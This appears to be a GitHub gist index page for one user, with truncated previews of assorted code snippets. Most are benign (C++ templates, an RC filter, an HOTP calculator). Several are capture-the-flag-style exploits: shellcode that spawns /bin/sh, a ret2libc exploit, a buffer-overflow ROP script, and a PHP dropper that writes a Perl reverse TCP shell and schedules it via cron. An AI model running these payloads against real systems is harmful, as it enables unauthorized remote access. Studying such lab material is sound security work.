safiire
/ variadic_print.cpp
Created
May 16, 2016 07:59
Interesting way of using the new variadic templates to create a variadic print() function.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Compile with: g++ -std=c++11 variadic_print.cpp -o variadic_print | |
| #include <iostream> | |
| // No argument case | |
| void print() {} | |
| // Recursive Variadic Template | |
| template <typename HEAD, typename ... TAIL> | |
| void print(const HEAD& head, const TAIL& ... tail) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| #include <unistd.h> | |
| #include <sys/types.h> | |
| #include <sys/wait.h> | |
| /* | |
| * A fork() doesn't (and shouldn't) re-randomize the address space | |
| * but that happens properly after the exec() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <string.h> | |
| #include <sys/mman.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <unistd.h> | |
| #include <string.h> | |
| // NOP padded execve("/bin/sh") | |
| char *sc = | |
| "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #pragma once | |
| #include <iostream> | |
| #include <cmath> | |
| #include <limits> | |
| #include "saf_math.h" | |
| //// Some more information for adding more functionality here: | |
| //// http://www.euclideanspace.com/maths/algebra/realNormedAlgebra/other/dualNumbers/functions/ |
safiire
/ october_aslr_setuid.rb
Last active
November 8, 2018 07:42
Return2LibC for a HTB setuid binary
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| # This is what we need to guess from ldd vuln | |
| ldd_load_address = 0xb75ba000 | |
| # Next get offset of system() and its address | |
| system_offset = 0x1e310 | |
| system_address = ldd_load_address + system_offset | |
| # Next get offset of /bin/sh from strings -d -tx libc.6.so, minus correction |
safiire
/ exploit.sh
Created
January 9, 2019 20:04
Buffer overflow from a small amount of space, with some ROP and env shellcode
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # ASLR is on (stack, libs, vdso, etc) | |
| # execstack is on | |
| # .text segment is static, no pie | |
| # | |
| # #include <string.h> | |
| # | |
| # int dobug(char *arg) { | |
| # char buf[8]; | |
| # strcpy(buf, arg); |
safiire
/ rc_filter.py
Last active
January 17, 2019 06:06
Rewrote RC filter in Python as a refresher
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #/usr/bin/env python | |
| from sys import stdout | |
| from math import pi, log10, pow | |
| Tau = 2 * pi | |
| TableWidth = 20 | |
| ## Calculate Decibels | |
| def db(ref, val): |
safiire
/ cron_executed_reverse_tcp.php
Created
September 26, 2018 22:54
So your shell won't inherit php's file descriptor situation.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $perl = 'use Socket;$i="xx.xx.xx.xx";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'; | |
| $fp = fopen('/tmp/shell.pl', 'w'); | |
| fwrite($fp, "#!/usr/bin/perl\n"); | |
| fwrite($fp, $perl); | |
| fclose($fp); | |
| system('chmod 777 /tmp/shell.pl'); | |
| $hour = date('H'); | |
| $minute = date('i') + 1; // disgusting | |
| $fp = fopen('/tmp/add_cron.sh', 'w'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| require 'base32' | |
| require 'openssl' | |
| # Script to calculate HOTP so I don't have to use my phone | |
| class HOTP | |
| def initialize(original_secret, counter = 0) | |
| secret = Base32.decode(original_secret) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| require 'uri' | |
| require 'net/http' | |
| require 'json' | |
| Url = 'http://hackback:6666/netstat' | |
| puts "Grabbing #{Url}" | |
| uri = URI.parse(Url) |